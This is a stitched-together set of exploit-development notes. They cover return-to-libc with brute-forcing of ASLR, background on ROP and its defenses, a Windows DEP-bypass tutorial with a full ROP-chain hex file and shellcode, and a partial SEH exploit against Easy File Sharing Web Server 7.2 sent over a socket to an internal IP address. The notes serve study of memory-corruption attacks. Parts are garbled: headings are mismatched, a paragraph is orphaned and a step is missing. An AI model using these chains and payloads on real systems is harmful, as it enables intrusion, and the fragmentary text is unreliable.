To do this we need three addresses from libc: the system() function, the exit() function, and
the string "/bin/sh".
We place them on the stack in the order
system → exit → /bin/sh
system() is the address EIP returns into, exit() is the return address system() uses when it
finishes, and the address of "/bin/sh" is the argument passed to system().
To find the offsets of these three items inside libc, you can run:
For SYSTEM:
> readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
For EXIT:
> readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
For /bin/sh:
> strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
We obtain the runtime addresses of system, exit and /bin/sh by adding these offsets to the
base address of libc.
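The address arithmetic and stack layout described above can be sketched in a few lines of Python 3. Every number below is a placeholder chosen for illustration (an assumption, not a value from a real system); on a real target the offsets come from the readelf and strings commands above, and the padding length from your own offset analysis.

```python
import struct

def p32(value):
    """Pack a 32-bit value in little-endian order."""
    return struct.pack("<I", value & 0xFFFFFFFF)

# Placeholder values (assumptions); substitute the ones found on the target.
libc_base     = 0xb7500000   # from: ldd ./ovrflw | grep libc
system_offset = 0x00040000   # from: readelf -s ... | grep system
exit_offset   = 0x00033000   # from: readelf -s ... | grep exit
binsh_offset  = 0x00160000   # from: strings -a -t x ... | grep /bin/sh
padding_len   = 112          # bytes needed to reach the saved return address

system_addr = libc_base + system_offset
exit_addr   = libc_base + exit_offset
binsh_addr  = libc_base + binsh_offset

# Stack layout: padding | system() | return address for system() | argument
payload = b"A" * padding_len + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)

print(len(payload), payload[padding_len:].hex())
```

Keeping the base address in a single variable makes it easy to swap in a different guess when ASLR is enabled.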
With ASLR enabled, however, the base address of libc changes on every run. One way to
overcome that is to brute-force the address. Run the following command several times to see
the change, which is minor: only two or three hex digits of the address differ. This is the
same command we used to check whether ASLR is enabled.
> ldd ./ovrflw | grep libc
Here we observe that only two or three hex digits are changing, so we can brute-force the
address.
Suppose we run the command “ldd ./ovrflw | grep libc” repeatedly and observe that only two
hex digits keep changing. Each hex digit can take 16 values (0-F), so two digits give
16*16=256 possible base addresses.
We pick one of the addresses printed by “ldd ./ovrflw | grep libc” and assign it to the base
address of libc in our script. Then we run our script in a loop. Each run has a 1 in 256 chance
that the randomized base matches the one we picked, so on average it takes about 256 runs to
succeed, although any single batch of 256 runs is not guaranteed to hit.
When the base address chosen by the loader matches the one hard-coded in our script, the
addresses of system, exit and /bin/sh are all correct, system("/bin/sh") executes, and we get
a root shell.
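To get a feel for how many runs a brute force needs, here is a rough estimate in Python 3. It assumes that exactly two hex digits of the libc base are randomized (16*16 = 256 equally likely bases) and that every run is independent; both are simplifying assumptions, and the function name is illustrative.

```python
def hit_probability(attempts, randomized_hex_digits=2):
    """Chance that at least one of `attempts` runs lands on the guessed base."""
    positions = 16 ** randomized_hex_digits
    return 1 - (1 - 1 / positions) ** attempts

for n in (256, 512, 1024):
    print(n, round(hit_probability(n), 3))
```

Because each run is an independent draw, the success rate approaches but never reaches 100%, so the exploit loop should simply keep going until a shell appears.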
https://www.youtube.com/watch?v=cj3CtsxVlL4
A non-executable stack can prevent some buffer overflow exploitation, however it cannot
prevent a return-to-libc attack because in the return-to-libc attack only existing executable
code is used. On the other hand, these attacks can only call preexisting functions. Stack-
smashing protection can prevent or obstruct exploitation as it may detect the corruption of
the stack and possibly flush out the compromised segment.
"ASCII armoring" is a technique that can be used to obstruct this kind of attack. With ASCII
armoring, all the system libraries (e.g., libc) addresses contain a NULL byte (0x00). This is
commonly done by placing them in the first 0x01010101 bytes of memory (a few pages more
than 16 MB, dubbed the "ASCII armor region"), as every address up to (but not including) this
value contains at least one NULL byte. This makes it impossible to emplace code containing
those addresses using string manipulation functions such as strcpy(). However, this technique
does not work if the attacker has a way to overflow NULL bytes into the stack. If the program is
too large to fit in the first 16 MB, protection may be incomplete.[2] This technique is similar to
another attack known as return-to-plt where, instead of returning to libc, the attacker uses the
Procedure Linkage Table (PLT) functions loaded in the position-independent
code (e.g., system@plt, execve@plt, sprintf@plt, strcpy@plt).[3]
Address space layout randomization (ASLR) makes this type of attack extremely unlikely to
succeed on 64-bit machines as the memory locations of functions are random. For 32-bit
systems, however, ASLR provides little benefit since there are only 16 bits available for
randomization, and they can be defeated by brute force in a matter of minutes.[4]
In this technique, an attacker gains control of the call stack to hijack program control flow and
then executes carefully chosen machine instruction sequences that are already present in the
machine's memory, called "gadgets".[4][nb 1] Each gadget typically ends in a return
instruction and is located in a subroutine within the existing program and/or shared library
code.[nb 1] Chained together, these gadgets allow an attacker to perform arbitrary operations
on a machine employing defenses that thwart simpler attacks.
In a standard buffer overrun attack, the attacker would simply write attack code (the
"payload") onto the stack and then overwrite the return address with the location of these
newly written instructions. Until the late 1990s, major operating systems did not offer any
protection against these attacks; Microsoft Windows provided no buffer-overrun protections
until 2004.[5] Eventually, operating systems began to combat the exploitation of buffer
overflow bugs by marking the memory where data is written as non-executable, a technique
known as executable space protection. With this enabled, the machine would refuse to
execute any code located in user-writable areas of memory, preventing the attacker from
placing payload on the stack and jumping to it via a return address overwrite. Hardware
support later became available to strengthen this protection.
With data execution prevention, an adversary cannot execute maliciously injected instructions
because a typical buffer overflow overwrites contents in the data section of memory, which is
marked as non-executable. To defeat this, a return-oriented programming attack does not
inject malicious code, but rather uses unintended instructions that are already present, called
"gadgets", by manipulating return addresses. A typical data execution prevention cannot
defend against this attack because the adversary did not use malicious code but rather
combined "good" instructions by changing return addresses; therefore the code used would
not be marked non-executable.
Return-into-library technique
The rise of 64-bit x86 processors brought with it a change to the subroutine calling convention
that required the first argument to a function to be passed in a register instead of on the stack.
This meant that an attacker could no longer set up a library function call with desired
arguments just by manipulating the call stack via a buffer overrun exploit. Shared library
developers also began to remove or restrict library functions that performed actions
particularly useful to an attacker, such as system call wrappers. As a result, return-into-library
attacks became much more difficult to mount successfully.
The next evolution came in the form of an attack that used chunks of library functions, instead
of entire functions themselves, to exploit buffer overrun vulnerabilities on machines with
defenses against simpler attacks.[8] This technique looks for functions that contain instruction
sequences that pop values from the stack into registers. Careful selection of these code
sequences allows an attacker to put suitable values into the proper registers to perform a
function call under the new calling convention. The rest of the attack proceeds as a return-
into-library attack.
Attacks
Return-oriented programming builds on the borrowed code chunks approach and extends it to
provide Turing complete functionality to the attacker, including loops and conditional
branches.[9][10] Put another way, return-oriented programming provides a fully functional
"language" that an attacker can use to make a compromised machine perform any operation
desired. Hovav Shacham published the technique in 2007[11] and demonstrated how all the
important programming constructs can be simulated using return-oriented programming
against a target application linked with the C standard library and containing an exploitable
buffer overrun vulnerability.
A return-oriented programming attack is superior to the other attack types discussed both in
expressive power and in resistance to defensive measures. None of the counter-exploitation
techniques mentioned above, including removing potentially dangerous functions from shared
libraries altogether, are effective against a return-oriented programming attack.
On the x86-architecture
It is therefore possible to search for an opcode that alters control flow, most notably the
return instruction (0xC3) and then look backwards in the binary for preceding bytes that form
possibly useful instructions. These sets of instruction "gadgets" can then be chained by
overwriting the return address, via a buffer overrun exploit, with the address of the first
instruction of the first gadget. The first address of subsequent gadgets is then written
successively onto the stack. At the conclusion of the first gadget, a return instruction will be
executed, which will pop the address of the next gadget off the stack and jump to it. At the
conclusion of that gadget, the chain continues with the third, and so on. By chaining the small
instruction sequences, an attacker is able to produce arbitrary program behavior from pre-
existing library code. Shacham asserts that given any sufficiently large quantity of code
(including, but not limited to, the C standard library), sufficient gadgets will exist for Turing-
complete functionality.[11]
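The backwards search described above can be sketched in Python 3. This is a toy illustration only: it lists the byte windows that end at each 0xC3 and does not check that the bytes decode to valid instructions, which real tools do with a disassembler. The function name and the sample bytes are illustrative assumptions.

```python
RET = 0xC3

def candidate_gadgets(code, max_len=4):
    """Yield (offset, bytes) windows that end at each ret (0xC3) byte."""
    for end, byte in enumerate(code):
        if byte != RET:
            continue
        for length in range(1, max_len + 1):
            start = end - length
            if start < 0:
                break
            yield start, code[start:end + 1]

# Toy input: pop eax; ret (58 c3) followed by pop edi; pop esi; ret (5f 5e c3)
sample = bytes.fromhex("58c35f5ec3")
results = list(candidate_gadgets(sample))
for offset, raw in results:
    print(hex(offset), raw.hex())
```

Note that some windows start in the middle of an earlier instruction; on x86 those unaligned starts can still decode to usable gadgets.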
An automated tool has been developed to help automate the process of locating gadgets and
constructing an attack against a binary.[12] This tool, known as ROPgadget, searches through a
binary looking for potentially useful gadgets, and attempts to assemble them into an attack
payload that spawns a shell to accept arbitrary commands from the attacker.
The address space layout randomization also has vulnerabilities. According to the paper of
Shacham et al.,[13] the ASLR on 32-bit architectures is limited by the number of bits available
for address randomization. Only 16 of the 32 address bits are available for randomization, and
16 bits of address randomization can be defeated by brute force attack in minutes. For 64-bit
architectures, 40 bits of 64 are available for randomization. In 2016, brute force attack for 40-
bit randomization is possible, but is unlikely to go unnoticed. Also, randomization can be
defeated by de-randomization techniques.
Even with perfect randomization, if there is any information leakage of memory contents it
would help to calculate the base address of for example a shared library at runtime.[14]
Since this new approach does not use a return instruction, it has negative implications for
defense. When a defense program checks not only for several returns but also for several jump
instructions, this attack may be detected.
Defenses
G-Free
The G-Free technique was developed by Kaan Onarlioglu, Leyla Bilge, Andrea Lanzi, Davide
Balzarotti, and Engin Kirda. It is a practical solution against any possible form of return-
oriented programming. The solution eliminates all unaligned free-branch instructions
(instructions like RET or CALL which attackers can use to change control flow) inside a binary
executable, and protects the free-branch instructions from being used by an attacker. The way
G-Free protects the return address is similar to the XOR canary implemented by StackGuard.
Further, it checks the authenticity of function calls by appending a validation block. If the
expected result is not found, G-Free causes the application to crash.[16]
This randomization approach can be taken further by relocating all the instructions and/or
other program state (registers and stack objects) of the program separately, instead of just
library locations.[18][19][20] This requires extensive runtime support, such as a software dynamic
translator, to piece the randomized instructions back together at runtime. This technique is
successful at making gadgets difficult to find and utilize, but comes with significant overhead.
Another approach, taken by kBouncer, modifies the operating system to verify that return
instructions actually divert control flow back to a location immediately following a call
instruction. This prevents gadget chaining, but carries a heavy performance penalty, and is not
effective against jump-oriented programming attacks which alter jumps and
other control-flow-modifying instructions instead of returns.[21]
SEHOP
As small embedded systems are proliferating due to the expansion of the Internet Of Things,
the need for protection of such embedded systems is also increasing. Using Instruction Based
Memory Access Control (IB-MAC) implemented in hardware, it is possible to protect low-cost
embedded systems against malicious control flow and stack overflow attacks. The protection
can be provided by separating the data stack and the return stack. However, due to the lack of
a memory management unit in some embedded systems, the hardware solution cannot be
applied to all embedded systems.[23]
In 2010, Jinku Li et al. proposed[24] that a suitably modified compiler could completely
eliminate return-oriented "gadgets" by replacing each call f with the instruction
sequence pushl $index; jmp f and each ret with the instruction
sequence popl %reg; jmp table(%reg), where table represents an immutable tabulation of all
"legitimate" return addresses in the program and index represents a specific index into that
table.[24]: 5–6 This prevents the creation of a return-oriented gadget that returns straight from
the end of a function to an arbitrary address in the middle of another function; instead,
gadgets can return only to "legitimate" return addresses, which drastically increases the
difficulty of creating useful gadgets. Li et al. claimed that "our return indirection technique
essentially de-generalizes return-oriented programming back to the old style of return-into-
libc."[24] Their proof-of-concept compiler included a peephole optimization phase to deal with
"certain machine instructions which happen to contain the return opcode in their opcodes or
immediate operands,"[24] such as movl $0xC3, %eax.
The ARMv8.3-A architecture introduces a new feature at the hardware level that takes
advantage of unused bits in the pointer address space to cryptographically sign pointer
addresses using a specially-designed tweakable block cipher[25][26] which signs the desired value
(typically, a return address) combined with a "local context" value (e.g., the stack pointer).
Before performing a sensitive operation (i.e., returning to the saved pointer) the signature can
be checked to detect tampering or usage in the incorrect context (e.g., leveraging a saved
return address from an exploit trampoline context).
Notably the Apple A12 chips used in iPhones have upgraded to ARMv8.3 and use
PACs. Linux gained support for pointer authentication within the kernel in version 5.7 released
in 2020; support for userspace applications was added in 2018.[27]
In 2022, researchers at MIT published a side-channel attack against PACs dubbed PACMAN.[28]
https://www.offensive-security.com/awe/AWEPAPERS/NtProtectVirtualMemory.pdf
GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM
binaries.
Rop Chain
https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/rop-chaining-return-oriented-programming
https://github.com/dannyc-dev/Building-the-ROP-Chain
https://www.youtube.com/watch?v=YY-2u7DgNgQ
An attack using a ROP chain is possible if the target application has an exploitable vulnerability.
Windows has two main mechanisms to safeguard software: Data Execution Prevention (DEP) and
Address Space Layout Randomization (ASLR).
Both mechanisms can be bypassed with more advanced techniques. DEP can be bypassed
by calling memory allocation/protection functions from the application import address table
(IAT). Some examples of such functions:
• SetProcessDEPPolicy(). With this function, an attacker can change the DEP policy for
the process, which ultimately allows shellcode to be executed from the stack. It
works only on Windows XP SP3, Vista SP1, and Server 2008 and requires the DEP policy to
be set to OptOut or OptIn.
• VirtualProtect() with PAGE_EXECUTE_READWRITE. It allows an attacker to mark the
memory page that holds the shellcode as executable by changing its access protection
level.
• NtSetInformationProcess(). The DEP policy for the current process can be changed using
this function, which allows an attacker to execute shellcode from the stack.
ASLR can be bypassed by determining the load address of the desired modules (for example,
kernel32.dll) and generating proper addresses for the whole ROP chain.
Let’s consider an example of an application with a stack overflow vulnerability. This program
allows an attacker to overwrite the return address in the stack frame and set EIP to the desired
value, thus executing code from the stack. For the sake of simplicity, in this article the
application supports only DEP protection and does not support ASLR protection – we disable
this option via Visual Studio project properties:
The simplest application with stack overflow issue may look like this:
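if (fileStream)
{
    // determine the length of the file
    fileStream.seekg(0, fileStream.end);
    int length = fileStream.tellg();
    fileStream.seekg(0, fileStream.beg);
    std::cout << "Reading " << length << " characters... ";
    // no bounds check: length can exceed the size of smallBuffer (stack overflow)
    fileStream.read(smallBuffer,length);
    if (fileStream)
        std::cout << "all characters read successfully.";
    else
        std::cout << "error: only " << fileStream.gcount() << " could be read";
    fileStream.close();
}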
As you can see, the stack overflow is easy to trigger. However, in order to build
this code in Visual Studio 2015, which is used in this article, we need to add
#pragma check_stack(off)
This app can be built using any other build environment without that option.
The file test.txt, which is read by the application, contains a ROP chain. The ROP chain is
specifically designed to bypass DEP protection and call our code.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 31 32 33 34 31 32 33 34
74 74 74 74 31 32 33 34 31 32 33 34 31 32 33 34
31 32 33 34 31 32 33 34 31 32 33 34 31 32 33 34
31 32 33 34 74 74 74 74 31 32 33 34 31 32 33 34
31 32 33 34 31 32 33 34 31 32 33 34 31 32 33 34
31 32 33 34 31 32 33 34 BA E3 83 6A 00 20 88 6A
FF FF FF FF 00 00 00 00 00 00 00 00 88 D5 84 6A
AB CF 82 6A 75 B9 85 6A 8E 4E 83 6A 00 F0 FF FF
A0 10 00 00 40 00 00 00 00 20 88 6A F8 60 83 6A
E5 FF 82 6A 00 20 88 6A F8 FF FF FF 6F 28 83 6A
6F 28 83 6A 78 BE 83 6A BA 25 84 6A BE 3C 85 6A
DE 10 83 6A 31 32 33 34 A3 5E 83 6A A3 5E 83 6A
A3 5E 83 6A 5B 5E 83 6A 56 16 83 6A FB 22 85 6A
D3 F3 85 6A 8B F4 81 C4 1C FF FF FF EB 22 75 73
65 72 33 32 2E 64 6C 6C 00 4D 65 73 73 61 67 65
42 6F 78 41 00 90 90 90 90 90 90 90 90 90 90 90
8D 46 0A 50 3E FF 15 60 50 88 6A 8B C8 8D 5E 15
53 51 3E FF 15 AC 50 88 6A FF D0 CC
In this file the ROP chain begins with ba e3 83 6a (0x6a83e3ba). This is the position in the file
that ends up in EIP when the return address is overwritten. ROPgadget.py is a utility that
gathers possible ROP gadgets for a given module. It was used to get ROP gadgets for
msvcp140.dll. In order to prepare proper addresses for the ROP chain, we need to determine
the load address of msvcp140.dll and the base address of msvcp140.dll. The load address is
constant during the Windows session since we disabled ASLR support before.
This example was originally published on https://www.apriorit.com/
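If we run our application in the testing environment we can see that the load address of
msvcp140.dll in this Windows session is 0x6a820000, which matches the chain in test.txt: the
gadget listed at 0x1001e3ba appears there as 0x6a83e3ba.
Using IDA Pro we can determine that the base address for msvcp140.dll is 0x10000000.
So the proper address for each ROP gadget is calculated as follows:
runtime address = gadget address - base address + load address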
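The rebasing calculation can be sketched in Python 3 as follows. The gadget addresses and the bytes from test.txt are taken from this example; the image base of 0x10000000 is an assumption inferred from the 0x1001xxxx gadget listings, and the function name is illustrative.

```python
def rebase(gadget_address, preferred_base, load_base):
    """Translate an address from the on-disk image to the loaded module."""
    return gadget_address - preferred_base + load_base

# First gadget as listed by the gadget finder, and the same gadget as it
# appears in test.txt (ba e3 83 6a -> 0x6a83e3ba).
listed_gadget  = 0x1001e3ba
runtime_gadget = 0x6a83e3ba

# Assumption: the gadget listing uses an image base of 0x10000000.
preferred_base = 0x10000000
load_base = runtime_gadget - (listed_gadget - preferred_base)

print(hex(load_base))
print(hex(rebase(0x1002d588, preferred_base, load_base)))
```

The second printed value can be compared against the bytes 88 D5 84 6A in the hex dump as a sanity check of the chosen base.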
The ROP chain is specifically designed to bypass DEP by calling the VirtualProtect() function and
then running our code in the memory whose protection was changed. The first thing that we
need in the ROP chain is to prepare the stack for the call to VirtualProtect() with the
flNewProtect parameter set to PAGE_EXECUTE_READWRITE. It can be achieved in a few steps:
1) load registers with useful values. In particular, eax receives a writable address
(0x6a882000) and edi receives 0xFFFFFFFF, so that the gadget at 0x1002d588 can capture the
stack pointer in the next step
0x1001e3ba : pop eax; pop edi; pop esi; pop ebp; ret
2) capture the stack pointer in edi
0x1002d588 : and edi, esp; add byte ptr[eax], al; ret 0x18
3) configure the stack for calling VirtualProtect. We need to place the VirtualProtect call
address from the application IAT, the return address and the parameters contiguously on the stack
0x1000cfab : mov eax, edi; pop edi; pop esi; pop ecx; pop ebp; ret
0x100110de : mov ecx, eax; mov eax, ecx; pop ebp; ret
0x10015ea3 : mov eax, dword ptr[eax]; ret
5) when the VirtualProtect function returns, the next chain of gadgets is executed in order to
move ESP to the code payload that was placed in test.txt right after our ROP chain:
6a8310de 8bc8 mov ecx, eax; mov eax, ecx; pop ebp; ret
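// payload bytes, as they appear at the end of test.txt
0x8B, 0xF4,                                  // mov esi,esp
0x81, 0xC4, 0x1C, 0xFF, 0xFF, 0xFF,          // add esp,0FFFFFF1Ch
0xEB, 0x22,                                  // jmp over the two strings and the NOPs
0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00,        // "user32.dll"
0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6f, 0x78, 0x41, 0x00,  // "MessageBoxA"
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,        // nop x 11
0x8D, 0x46, 0x0A,                            // lea eax,[esi+0Ah]
0x50,                                        // push eax
0x3E, 0xFF, 0x15, 0x60, 0x50, 0x88, 0x6A,    // call dword ptr ds:[6A885060h]
0x8B, 0xC8,                                  // mov ecx,eax
0x8D, 0x5E, 0x15,                            // lea ebx,[esi+15h]
0x53,                                        // push ebx
0x51,                                        // push ecx
0x3E, 0xFF, 0x15, 0xAC, 0x50, 0x88, 0x6A,    // call dword ptr ds:[6A8850ACh]
0xFF, 0xD0,                                  // call eax
0xCC };                                      // int 3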
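As a sanity check on the payload layout, the following Python 3 sketch rebuilds the tail of test.txt from the hex dump above and confirms that the offsets used by the two lea instructions point at the embedded strings. It assumes that ESI holds the address of the first payload byte when those instructions run; the helper name is illustrative.

```python
# Tail of test.txt as shown in the hex dump above (bytes after the last gadget).
payload = bytes.fromhex(
    "8bf4 81c41cffffff eb22"
    "7573657233322e646c6c00"          # "user32.dll\0"
    "4d657373616765426f784100"        # "MessageBoxA\0"
    "9090909090909090909090"          # 11 NOPs
    "8d460a 50 3eff15 6050886a 8bc8 8d5e15 53 51 3eff15 ac50886a ffd0 cc"
)

def c_string(data, offset):
    """Read a NUL-terminated ASCII string starting at offset."""
    end = data.index(b"\x00", offset)
    return data[offset:end].decode("ascii")

dll_name  = c_string(payload, 0x0A)   # displacement in lea eax,[esi+0Ah]
func_name = c_string(payload, 0x15)   # displacement in lea ebx,[esi+15h]

# The short jump (eb 22) skips 0x22 bytes counted from the end of the jump.
jmp_offset = payload.index(b"\xeb\x22")
jmp_target = jmp_offset + 2 + 0x22

print(dll_name, func_name, hex(payload[jmp_target]))
```

The jump target is the first byte of the lea instruction that follows the NOPs, so the strings are never executed as code.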
https://www.apriorit.com/dev-blog/434-rop-exploit-protection
https://www.youtube.com/watch?v=5FJxC59hMRY
The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory
corruption vulnerability as a result of an HTTP request.
The offset to SEH is 2563 bytes. Instead of using a pop <reg> pop <reg> ret sequence, as is
normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This moves
ESP from a region of the stack that we do not control to a region of the stack that we do
control - and then returns into it.
import sys
import os
import socket
import struct
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp
0x10022869. After sending the exploit POC - we will need to view the contents of the
exception handler with the WinDbg command !exchain.
As a breakpoint has already been set on the address inside of SEH, all that is needed to pass
the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and
we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the
stack.
One constraint to keep in mind: we have about 980 bytes to work with.
What is the goal of this method of bypassing DEP? The goal here is not to dynamically
change the permissions of memory to make it executable - but instead to write our shellcode,
dynamically, to memory that is already executable.
As we know, when DEP is enabled, memory is either writable or executable - but not both at
the same time. The previous statement about writing shellcode, via WriteProcessMemory(), to
executable memory seems contradictory knowing this. If memory is executable, adhering to
DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily
marking memory pages as RWX while data is being written to a destination - even if that
destination doesn’t have writable permissions. After the write succeeds, the memory is then
marked again as execute only.
From an adversary’s perspective, this has a practical consequence. Certain shellcodes employ
encoding mechanisms to bypass character filtering. If this is the case, encoded shellcode which
is dynamically written to execute only memory will fail when executed. This is due to the
encoded shellcode needing to “write itself” over adjacent process memory to decode. Since
pages are execute only, and we do not have the WriteProcessMemory() “pass” to write to
execute only memory anymore, an access violation will occur. Something to definitely keep in
mind.
Let’s first take a look at the call to WriteProcessMemory(), to help make sense of all of this
(per Microsoft Docs)
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
);
Let’s break down the call to WriteProcessMemory() by taking a look at each function
argument.
3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address
specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode +
NOPs, if necessary, will be).
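To make the argument list concrete, here is a minimal Python 3 sketch of how a 32-bit stdcall call to WriteProcessMemory() is laid out on the stack when it is reached through a ret. All addresses and the size are made-up placeholders (assumptions for illustration only). In a real chain these values usually have to be written at runtime by ROP gadgets rather than placed directly in the buffer, because of bad characters and the changing stack address.

```python
import struct

def p32(value):
    """Pack a 32-bit value in little-endian order."""
    return struct.pack("<I", value & 0xFFFFFFFF)

# Every value below is a hypothetical placeholder.
WRITE_PROCESS_MEMORY = 0x11111111  # address of WriteProcessMemory()
CODE_CAVE            = 0x22222222  # executable destination (lpBaseAddress)
SHELLCODE_PTR        = 0x33333333  # where the shellcode sits on the stack (lpBuffer)
SHELLCODE_SIZE       = 0x180       # nSize
BYTES_WRITTEN_PTR    = 0x44444444  # writable DWORD (lpNumberOfBytesWritten)
CURRENT_PROCESS      = 0xFFFFFFFF  # pseudo-handle (-1) for the current process

frame = b"".join([
    p32(WRITE_PROCESS_MEMORY),  # ret lands here and enters the API
    p32(CODE_CAVE),             # return address: run the copied shellcode
    p32(CURRENT_PROCESS),       # hProcess
    p32(CODE_CAVE),             # lpBaseAddress
    p32(SHELLCODE_PTR),         # lpBuffer
    p32(SHELLCODE_SIZE),        # nSize
    p32(BYTES_WRITTEN_PTR),     # lpNumberOfBytesWritten
])

print(len(frame), frame.hex())
```

Using the destination as the return address means that execution continues in the freshly written shellcode as soon as the API returns.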
One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually -
each ROP gadget ends with a ret instruction. ret, from a technical perspective, will take
the value pointed to by RSP (or ESP in this case), which will be the address of the next ROP
gadget on the stack, and load it into RIP (EIP in this case). Since ROP must be performed on the
stack, and due to the dynamic nature of the stack, the virtual memory addresses associated
with the stack are also dynamic.
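The way ret drives a chain can be modelled with a toy interpreter in Python 3. This is a simplified sketch, not an emulator: the stack is a list of DWORD-sized entries, gadgets are Python functions, and the gadget addresses (0x1000, 0x2000) are hypothetical.

```python
def run_chain(stack, gadgets):
    """Tiny model of 'ret': pop the next address from the stack and run that gadget."""
    regs = {"eax": 0, "ecx": 0}
    esp = 0                                # index of the entry ESP points to
    trace = []
    while esp < len(stack):
        address = stack[esp]
        esp += 1                           # ret: pop the gadget address into EIP
        gadget = gadgets.get(address)
        if gadget is None:
            break                          # not a known gadget: stop the model
        esp = gadget(regs, stack, esp)     # a gadget may pop further values
        trace.append(hex(address))
    return regs, trace

def pop_eax(regs, stack, esp):             # models: pop eax; ret
    regs["eax"] = stack[esp]
    return esp + 1

def mov_ecx_eax(regs, stack, esp):         # models: mov ecx, eax; ret
    regs["ecx"] = regs["eax"]
    return esp

gadgets = {0x1000: pop_eax, 0x2000: mov_ecx_eax}   # hypothetical addresses
stack = [0x1000, 0xdeadbeef, 0x2000]
regs, trace = run_chain(stack, gadgets)
print(trace, hex(regs["ecx"]))
```

The value 0xdeadbeef sits between the two gadget addresses because the first gadget consumes it with its pop before its own ret runs.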
As seen below, when the stack pivot is successfully performed, the virtual address of the stack
is 0x029a68dc.
Restarting the application and pivoting to the stack again, the virtual address of the stack is
at 0x028068dc.
At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of
each module, and their static nature - the stack still seems to change! Although the stack is
dynamically being resolved to seemingly “random” and “volatile to the duration of the
process” memory - there is a way around this. If we can use a ROP gadget, or set of gadgets,
properly - we can dynamically store an address around the stack into a CPU register.
Let’s start our ROP chain by preserving an address near the current stack pointer.
As you may or may not know, the base pointer (EBP) points to the “bottom” of the current
stack frame (we will refer to the current stack frame as “the stack”). This means that EBP
should be relatively close to ESP. We can validate this in WinDbg by viewing the current state
of the CPU registers after the stack pivot.
After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use
rp++ by taking a look at my last ROP blog post) - a nice gadget resides in sqlite3.dll that can
help us preserve the address of EBP into another “common” register, which has more useful
ROP gadgets as we will see later on, such as EAX.
Replace the NOPs in the previous PoC script, under the “Begin ROP chain” comment, with the
above address. After firing off the updated PoC, we land on our intended ROP gadget.
After executing the above gadget, EAX is now loaded with an address near the current stack.
Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.
Although EAX is relatively close to ESP - it is still a decent ways away. Currently, EAX (which
now contains the old value of EBP) is 0xfec bytes away from ESP.
To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.
Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating
EAX to contain the address of ESP + 0x38).
As we will see later on, we would like to preserve an address around ESP into another
“common” register, ECX. ECX is a register that is used as a “counter” (although technically it is
a general purpose register). This means that ECX generally is a part of some more useful ROP
gadgets.
In order to do this, ESP will eventually need to be increased by 0x24 bytes to get the
value (technically the future value) of ESP into ECX, due to the nature of the ROP gadgets available
within the process memory. The gadget we need performs an add esp, 0x24 as a side effect,
which is collateral damage we have to accept to get the job done. There will be
4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of
0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp,
0x24 gadget is executed (0x38 - 0x24 = 0x14).
This is the reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24: we
will need 0x14 bytes worth of ROP gadgets between now and then. By the time the ROP
gadgets before the add esp, 0x24 instruction have executed, the value in EAX will be ESP + 0x24.
However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp,
0x24 instruction, EAX would contain a value of ESP + 0x10.
Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of
ESP after the ESP + 0x38 stack manipulation occurs - we will prepare EAX in advance.
Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of
ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense
now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time
being.
0xffffefe0 (Value to be popped into ECX. This is the negative representation of the distance
between the current value of EAX and ESP + 0x38).
Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded
0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX
will contain NULL bytes - which will kill our exploit. Instead, we will use the negative
representation of numbers and perform subtraction in order to get around this problem.
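The negative-number trick can be checked quickly in Python. This is only a sketch: the helper names neg32 and has_null_byte and the starting EAX value are made up for illustration, and 0x1024 is the example distance from the paragraph above.

```python
import struct

MASK = 0xFFFFFFFF


def neg32(value):
    """Return the 32-bit two's complement negation of value."""
    return (-value) & MASK


def has_null_byte(dword):
    """True if the little-endian encoding of dword contains a 0x00 byte."""
    return b"\x00" in struct.pack("<L", dword)


distance = 0x1024              # example distance from the text
encoded = neg32(distance)      # value that would be popped into ECX

# sub eax, ecx with ECX = -distance behaves like add eax, distance (mod 2**32)
eax = 0x02806000               # hypothetical starting value of EAX
result = (eax - encoded) & MASK

print(hex(encoded), has_null_byte(distance), has_null_byte(encoded))
print(hex(result))
```

The positive value packs with two 0x00 bytes, while its two's complement does not, and subtracting the encoded value yields the same result as adding the original distance.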
